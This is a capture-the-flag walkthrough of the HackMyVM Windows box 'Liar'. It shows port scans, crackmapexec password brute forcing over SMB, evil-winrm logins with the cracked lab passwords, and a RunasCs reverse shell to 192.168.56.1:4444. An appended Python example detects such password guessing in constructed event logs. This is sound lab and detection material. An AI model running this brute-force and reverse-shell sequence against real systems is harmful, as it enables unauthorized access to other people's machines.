Liar
September 21, 2024

Page: HackMyVm
Created by: sml
Difficulty: Easy
OS: Windows

I start with a scan of the open ports.

nmap -p- --open -vvv -sS --min-rate 5000 -Pn -oG scan 192.168.56.103

Then I scan the open ports for services and versions.

nmap -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 -sCV 192.168.56.103 -oN ports

I access the website and discover a potential user. I try to brute force his password with crackmapexec through the SMB service.

crackmapexec smb 192.168.56.103 -u nica -p /usr/share/wordlists/rockyou.txt --local-auth

I log in as nica with evil-winrm.

evil-winrm -i 192.168.56.103 -u nica -p hardcore

I find the first flag and another potential user. I try to brute force that user's password with crackmapexec through the SMB service as well.

crackmapexec smb 192.168.56.103 -u akanksha -p /usr/share/wordlists/rockyou.txt --local-auth

I try to connect as akanksha with evil-winrm, but it does not allow me to connect.

evil-winrm -i 192.168.56.103 -u akanksha -p sweetgirl

As it does not allow us to log in as akanksha, we can instead run commands as that user from the nica session and spawn a reverse shell. For that we can use RunasCs. We import the module and launch the reverse shell as akanksha back to my machine.

Import-module ./Invoke-RunasCs.ps1
Invoke-RunasCs akanksha sweetgirl powershell -Remote 192.168.56.1:4444

This user has permissions to view the root flag.
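Both footholds above come from guessing local account passwords over SMB, which on the target shows up as a burst of failed network logons (Security event 4625, LogonType 3) from one source followed by a success (4624). The following added example, which is not part of this writeup or of any of the tools it uses, runs that detection over a constructed sample of such events; the log format, the sample timestamps and the thresholds are assumptions chosen for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (not real logs): each line is
# "<timestamp>|<EventID>|<TargetUserName>|<IpAddress>|<LogonType>".
# EventID 4625 = failed logon, 4624 = successful logon; LogonType 3 = network
# (SMB / WinRM), which is what a wordlist attack over SMB looks like on the host.
SAMPLE_LOG = "\n".join(
    [f"2024-09-21T10:00:{i:02d}|4625|nica|192.168.56.1|3" for i in range(12)]
    + ["2024-09-21T10:00:13|4624|nica|192.168.56.1|3",
       "2024-09-21T10:05:00|4625|akanksha|192.168.56.1|3",
       "2024-09-21T10:05:02|4625|akanksha|192.168.56.1|3",
       "2024-09-21T11:00:00|4624|akanksha|192.168.56.1|3"]
)

def parse_events(text):
    """Parse the pipe-delimited sample format into a list of dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, user, ip, ltype = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user, "ip": ip, "type": int(ltype)})
    return events

def detect_password_guessing(events, threshold=10, window=timedelta(minutes=2)):
    """Flag (user, source IP) pairs with >= threshold network-logon failures
    inside `window`, and mark whether a success from the same IP followed.
    Returns {(user, ip): {"failures": n, "compromised": bool}}."""
    failures = defaultdict(list)
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] != 3:          # only network logons are of interest here
            continue
        key = (ev["user"], ev["ip"])
        if ev["id"] == 4625:
            window_start = ev["ts"] - window
            failures[key] = [t for t in failures[key] if t >= window_start] + [ev["ts"]]
            if len(failures[key]) >= threshold:
                alerts.setdefault(key, {"failures": 0, "compromised": False})
                alerts[key]["failures"] = len(failures[key])
        elif ev["id"] == 4624 and key in alerts:
            # A success right after a burst of failures means a guess landed.
            alerts[key]["compromised"] = True
    return alerts

if __name__ == "__main__":
    for (user, ip), info in detect_password_guessing(parse_events(SAMPLE_LOG)).items():
        print(f"{user} from {ip}: {info['failures']} failures, compromised={info['compromised']}")
```

With the sample, only nica trips the threshold and is marked compromised; akanksha's two failures stay below it, which is why the threshold and window should be tuned to the environment and why an account lockout policy removes the attack path entirely.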